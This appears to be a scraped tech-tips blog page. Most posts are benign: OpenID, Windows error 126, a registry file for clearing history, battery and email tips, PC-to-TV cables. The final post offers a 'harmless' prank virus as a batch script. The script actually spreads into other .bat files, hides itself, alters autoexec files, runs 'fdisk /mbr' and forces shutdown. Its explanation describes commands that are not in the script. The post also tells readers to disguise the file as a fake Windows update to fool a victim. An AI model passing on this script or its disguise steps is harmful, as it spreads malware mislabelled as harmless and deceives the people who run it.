openId information

When you sign into your Gmail account, you’re automatically signed into all Google Services — Docs, Blogger, Reader, whatever. And you like that, don’t you? We do too. It’s hasslefree, and hassle-free is good indeed. But then, you need another ID for your Yahoo! account. And another for your Windows Live services. And another for some other services we can’t really think of right now.

And then came OpenID — the initiative that promised us a single ID. If you remember just one single password, you’re set to access all the services you ever need. It’s more hassle-free than what we’re used to now, so it can only be better.

Read more

The new operating system is much faster, smoother and more classic (beautiful). If you are still using Linux 9.10, perhaps, this is the best time to switch.
Read reviews

Download ubuntu 10.04

There are several great BitTorrent applications available online. One of the many that comes to mind is uTorrent. Okay, that sounds great – but how about this – an Online torrent application that does not require installation on your system! The use of httpTorrents gives users the option to download files directly without having to use a BitTorrent client.

Basically, you don’t have to worry about:

  • - No uploading
  • - No blocking
  • - No ratings
  • - No wait

It is always 100% download and guaranteed with fast speed (claims obtained from website). Everyone can use httpTorrents, but in the future the download speed and number of simultaneous downloads will be limited for free users. Those who want to use it more than occasionally will have the option to sign up for a premium account without restrictions. So, why not check it out and experience it yourself now.

visit httpTorrents

Social networking is big. So big that everyone’s jumping in. Or trying to. But Facebook, Twitter, and LinkedIn just don’t fit with every organization’s means, methods, and mission. In fact, for many the fit is downright awful. While every organization is composed of people, most aren't about sharing highly personal information, playing games (and pranks), and testing ego boundaries. That’s where Ning comes in.

ning-logo Ning at is a lot like a Facebook community you build from scratch to suit your business or group. Highly customizable in appearance, function and applications, it can include forums, groups, chat, polls, photos, blogs, games, sales and marketing tools, productivity suites (Google Docs, Zoho) and widgets and gadgets galore. Members have their own, customizable pages. Wow!

Before I get to the rave, I’ve got to tell you this. The basic, ad-supported version (unobtrusive right column tower ad) is free. Premium versions using your own domain name, without ads, with more space and bandwidth are available at modest cost. The price is definitely right.

But the two things that will make you love Ning are (a) the ease of customizing from appearance to layout to adding and configuring features to privacy, and (b) the speed. Ning beats every other social networking community hands down for speed of loading and updating. This is a community for the impatient man (and woman).

Error 126 in the Windows operating system signals a problem with the loading of a dynamic link library (DLL). DLL files are used in Windows to re-use common functionality or to make the executable file smaller. DLL files can be loaded during the startup of the application (EXE) or at runtime, when the functionality is needed.

When Windows or any program tries to load a DLL and it fails, system error 126 may occur. As a result, error 126 can happen with almost any program that is using DLL files, like games, DirectX, databases, etc.
Top Causes for Windows Error 126

Even though the basic problem with error 126 is the failure to load the DLL file, there can be a number of causes for this error. The first possibility is that the DLL file is really missing. In itself this is a rare cause, as DLL files are not normally in a location where they would be accidentally deleted.
The second possibility is that the DLL file is corrupt. When Windows tries to load the DLL file, the file needs to adhere to a specific format, or the loading will fail. Possible causes for file corruption are disk errors, viruses and malware.
The third possible option is that the DLL file is where it should be and the file is not corrupt, but the reference to the DLL file is corrupt. This would mean a problem with the Windows registry. All DLL files need to be registered in Windows, and the details of these DLLs are recorded in the Windows registry. So if the details are corrupt or missing, the DLL will not load as well.
Fixing DLL error 126.

Considering the causes for Windows error 126, there are a number of steps you can take to repair this error.

• Run a disk check to check the hard disk for any errors that may be responsible for file corruption.

• If the DLL file is a Windows system file, you may be able to repair the DLL file by running “SFC SCANNOW” at the command prompt. This will require administrator access rights, so use a user account with admin level rights. The SFC command checks the Windows system files and tries to repair any errors found. When an error is found, you may be required to provide the original Windows CD to retrieve the original files.

You can also try to manually restore the copy of a Windows DLL file from the Windows setup CD using the “expand” command, but in general the SFC command is easier and more reliable.

• Update your antivirus software and run a full system scan. This will take some time, but it will ensure that there is no virus on your hard disk that could be responsible for the DLL file corruption.

• Reinstall the software in which the error is occurring. If a game is experiencing Windows error 126, try reinstalling the game. If you get Windows error 126 for a DirectX dll, like d3dx9_36.dll, try reinstalling DirectX 9.

Reinstalling the software will generally restore the missing or corrupt DLL file and also reregister it in the Windows registry, in many cases fixing Windows error 126. If reinstalling does not work the first time, uninstall the software first, reboot and then reinstall the software.

This tip will help you to manage the all types of user history in windows operating system. This is a built-in feature of all windows keeps track the user's history, for example the websites you have visited, the documents you have opened and the keywords or files for which you've searched. However this tip is very useful for you, if you are sharing your computer with others or you do not want that the other persons know about your last visited documents history. You can clear these kinds of user's history with a single click on desktop icon named Cleanmru.reg. There is no need to clear each history file one by one. This trick will work in windows versions like windows 2000, XP and 2003.

Follow the given steps for configuration to clear recently opened documents automatically:

To edit the computer registry, first you should log onto your computer with administrative rights.

Here copy the following 6 lines and paste in notepad then save with the name Cleanmru.reg on your desktop.


[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs]





[-HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru]

When you double-click Cleanmru.reg icon to remove the windows history, a small dialog box will appear with the information "Are you sure you want to add the information in C:\Documents and Settings\Administrator\desktop\Clearmru.reg to the registry?"

Click on yes.

At the end, you will get the message "Information in C:\Documents and Settings\Administrator\desktop\Clearmru.reg has been successfully entered into the registry." Click on Ok button and verify that your all history will have been clear.

Spyware is computer software that is installed on a user's computer without the user's express consent with the purpose of collecting information about the user, their computer or browsing habits.
Read more about spyware
Here is the software to protect you from spywares: spyware terminator

Key features of the software:
  • Fast spyware scanning
  • 100% real-time protection
  • HIPS protection
  • Antivirus protection
  • Multilanguage Support

Download spyware terminator

AveFolderBG is a application which adds an extra option under windows explorer folder properties where you can set image background for any folder as shown in the image below.


In order to install this for windows explorer, just double click install.bat and follow the on screen instructions. When you want to get rid of this you just need to double click uninstall.bat and it will remove itself from windows.

Note: In order to install this shell extension you need to have administrative privileges and mind it that when you install this it might windows explorer so that the changes done by the software can take place.

When you set the image to a windows 7 folder with this tool, it will looks like as shown below. You can also change the color of file names text inside a folder and also add shadow over the text.


It works for both 64 bit and 32 bit version of windows 7.

Download AveFolderBG

While laptops are convenient and portable, they do have their disadvantages. For your laptop is only convenient and portable when it has battery life. Here are some tips from on how to maximize battery life.

  • Don’t run it down to empty. When you let your battery’s power run out, it can weaken it over time. Luckily, most newer computers have a feature that will power your computer down before the battery runs out, thus protecting it.
  • Keep your laptop cool. Heat will break down your battery. Keep it cool by making sure the vents aren’t being blocked, and clean your vents once in awhile with compressed air.
  • Remove your battery when not using it. During times when you’re keeping your laptop plugged in, you can remove the battery so that you aren’t constantly charging and draining it, therefore wearing it out. WARNING! Do NOT attempt to remove your battery when the computer is on, as this can cause your system to crash! Also, an unused battery will still slowly lose power, so don’t remove it when there is only a little life left, or you risk draining it.
  • Keep your screen dim. It takes a lot of power to keep your screen brightly lit, so a dimmer screen will use less power. It also might be easier on your eyes.
  • Turn off hardware when its not in use. If you’re not using your Bluetooth, Wi-Fi, or sound, turn these features off. Also, if you don’t need an external mouse, don’t use one, as it will sap your power as well.
  • Don’t multitask. The more programs you’re using, the more power is being drained. And if you’re not online, you don’t need to be running your antivirus or firewall in the background.
  • Save multimedia for when you have AC power. Wait to watch videos when you have your computer plugged in.
  • Know when to turn your computer off. What system you have will determine when you want to hibernate your computer and when you want it on standby. Windows 7 takes a long time (and power) to go in and out of hibernation, so its best to put in sleep or standby mode if you’re going to use it again in a few hours. However, Windows XP will still drain power when sleeping, so turn it off if you’re not going to use it again in a half hour or more.
There are many times you may want to set different custom keyboard shortcuts for different purpose like launching a program, ending or closing a program, maximizing a window, minimizing a window etc.

HotKeyMan is a freeware tool which lets you setup personal shortcuts for often used tasks to be globally available in all open programs. A simple guide will help you setup the initial hotkey settings the first time the program is started. After that, the hotkeys can be used all over Windows.


It will allow you to setup hot keys for the following things like Maximize / Minimize active window, Close active window, Open a file or run an application, Grap screen capture of active window or the whole screen, turn off computer or log off Windows, Send keystrokes to the active program as shown in the image below.


You can setup hotkeys to manipulate window state, close a running application, open a document, save screen capture to file, exit windows or send keystrokes to the active window.


This application requires installation, and so that all the shortcuts specified by this application works it should be running so better add the program in system startup. It seems to be work on all windows version including windows 7.

Download HotKeyMan

Simple to implement, these tips can be a good start to making sure your e-mail communication becomes more secure.

1. Understand that no e-mail communication is 100% secure. We can do our best to make the percentage close to that, but sometimes - if the information is extremely important - you should consider ditching the e-mail option and deliver it in person (if possible). Avoid sending credit card or social security numbers via e-mail. It's also a good idea not to send user names and passwords for accounts you don't want to see compromised.

2. The more your e-mail is present in the confines of the cyberworld, the more spam you'll be likely to receive. Unfortunately, even if you're careful with disclosing your e-mail, chances are people will include you in mass mailings and you eventually your e-mail will be out there. To counteract this, you should definitely set up filters and rules. They will not catch every unwanted e-mail, but they will reduce their number. This is not just a matter of annoyance - basic users and novices are more susceptible to spam and scams. So why give the bad guys the possibility of trying out their angle?

3. Tied to the previous advice is this one: choose plain text over full HTML or XHTML rendition to reduce the risk of being targeted by a phishing attack.

4. Don't open attachments unless you know who it's coming from and you trust them.

5. Use encryption. Check with your ISP to see if they encrypt the authentication process. Encrypt your email message if possible. Are you familiar with the concept of steganography? You can hide messages in images, articles, shopping lists... Ideally, you can use both - first encrypt the message, then use a steganography software to embed it in a recent photograph. There are simple tools out there.

6. Don't access your e-mail from an unsecured network or potentially compromised computers. Yes, that particularly includes access from an Internet cafe. There be keyloggers.

7. Teach everybody who wants to know about it, especially your children (AND especially if you're using the same computer).

The NetBeans integrated development environment (IDE) delivers! The NetBeans IDE can boost your productivity when you're working with Java SE, Java EE, or Java ME technology as well as PHP, Ruby, Ruby on Rails, Groovy, Python, JavaScript, JavaFX and C/C++. Visual tools that generate skeleton code are also available, letting you create a basic application without writing a single line of code.

Top reasons to switch to NetBeans

Download NetBeans IDE


Shows Internet users how to get the most out of Internet searches, portals, and commerce sites

* Covers using Google to solve mathematical equations, making search engines safe for kids, harnessing the full power of Yahoo!, and getting the best bargains on shopping sites

* Explains how to search for street addresses and phone numbers, stock quotes and other financial information, MP3s and other digital music, computer programs and utilities, medical information, legal information, genealogical information, job listings, and more

* Reveals the secrets behind directory sites, indexing, and search result rankings

Download book

Talking about a different way to convert file types a file conversion site which is having lot's of conversion types available. And the conversion process is also very easy.It is also providing a good level of efficiency & quality.

For example if you want to convert a PDF file to other text type then follow the following steps:

Go to and click the Browse button next to Step 1 and choose your file. By default, Step 2 will be set to DOC format, but you can choose to convert your PDF to other file types such as TXT, HMTL, RTF, etc. Type in your email address for Step 3 and click Convert.

You should receive an email within a few minutes with a download link to your converted file.It is able to convert some pretty complex PDF documents with text in multiple columns, multiple images, etc with good accuracy.

You can perform many other conversions using the same site.

Suppose you want to watch your trip photos on your hdtv or you want to enjoy movies or games stored on your pc on your hdtv then here are the different ways to connect your pc with your tv.

1. S-Video – This is probably the most common method out there currently because an S-Video cable is cheap as heck and just about every TV under the sun has a S-Video port. You’ll have to make sure you laptop is equipped with this port. Remember, there are two types of S-Video cables: 4-pin and 7-pin. Most laptops and PC’s are equipped with a 7-pin port, so if your TV only has a 4-pin S-Video port, then this method will not work.

2. VGA – If you have a HDTV, then you will be better off connecting using a VGA cable. It gives much better quality than S-Video and as with S-Video, the cable is very cheap. You usually won’t find a VGA port on regular TV’s though, so this option is if you have an HDTV.

3. DVI - DVI stands for Digital Visual Interface with “digital” being the key word there. The digital signal will give a higher quality picture than either S-Video or VGA. Of course, your computer will need to have a DVI connection and your TV will need to be an HDTV. This cord is definitely not cheap, it ranges anywhere from $40 to $80.

4. HDMI – Using HDMI will give you the best quality by far. No computers that I know of yet have HDMI ports, but you can get a DVI to HDMI cable to connect it to your HDTV. HDMI is compatible with DVI.

5. Scan Converter Box – This is the last method that I could think of and it involves using a scan converter box, which takes a VGA signal and converts it into S-Video or component video.

Here’s a graphic I created with some pictures of the various cables:


Hope this helps someone! If you have any other ideas or suggestions, please feel free to comment!! Thanks!

Gmail recently enabled a feature for Mozilla and Chrome users. Instead of browsing your computer to find files to attach, you can now just drag and drop files into your Gmail messages.

First, make sure you are using Firefox or Chrome. This will not work in Internet Explorer, at least not yet.

Click compose mail.


Open the folder on your computer containing the file you want to attach. once you have that window open, click on the file and drag it into the space near where the attach file link is in Gmail.

Understand the following: It's just a harmless "virus". It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.


@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:\tmp.bat >null attrib +r +s +h c:\tmp.bat echo for %%i in (*.bat) do copy c:\tmp.bat+%%i %%i >>c:\windows\system32\autoexec.NT
echo echo virus detected! >>c:\windows\system32\autoexec.NT
echo pause >>c:\windows\system32\autoexec.NT
echo NT core:infected!
echo echo shame on you! >>c:\autoexec.bat
echo echo system hault-virus identified! >>c:\autoexec.bat
echo chkdsk >>c:\autoexec.bat
echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c "windows has shut down because the last service has incountered a write fault at 0x00000000000000000000000000000000000"

This code Details:

@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2>nul (pings your localhost - nothing much)
shutdown.exe (shutdown)

Preparing the Virus:

Read and understand the warnings!
Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.
Copy and Paste the Code of the "virus" into Notepad
Click File -> Save as
Decide for a location to save the fake-virus. You should chose a location where the user won't find the file, so saving it on the desktop would be a bad idea!
Change ".txt" to "All files" in the file type drop-down menu
Chose a harmless filename. Replace the ".txt" at the with ".bat"
Click on save and close Notepad.

Making a fake Icon:

Now, that we have our Virus saved, we should prepare a decoy:

Right click on the desktop and go over to "new" then click "short cut".
For the location of the short cut chose our Virus.
Click next
Give the shortcut a name that your victim will click on. ("Music for free", "My Documents", "Critical Windows-Update" "Get Free Cinema-Tickets" or "Internet Explorer")
Click on "Finish"
Right click on the shortcut you have just made and chose "properties". Now click on the "chose icon" button and scroll through the list of icons.
Decide for one of the icons that fits well to the name, chose it by clicking on it and hit OK twice.

Shock your Victim:

Now it's time to sit back and enjoy the show!
You should really try not to laugh before the computer shuts down! (Think of sth. said)
As the computer goes out, you should check whether your friend is okay and then you may start laughing and start the computer again.

Abort Shutdown-Countdown:

Sometimes it might be necessary to stop the countdown before the computer shuts down. Here's how to:

Open the start menu.
Click Run
Type "shutdown.exe -a" and press enter/return.

Popular Posts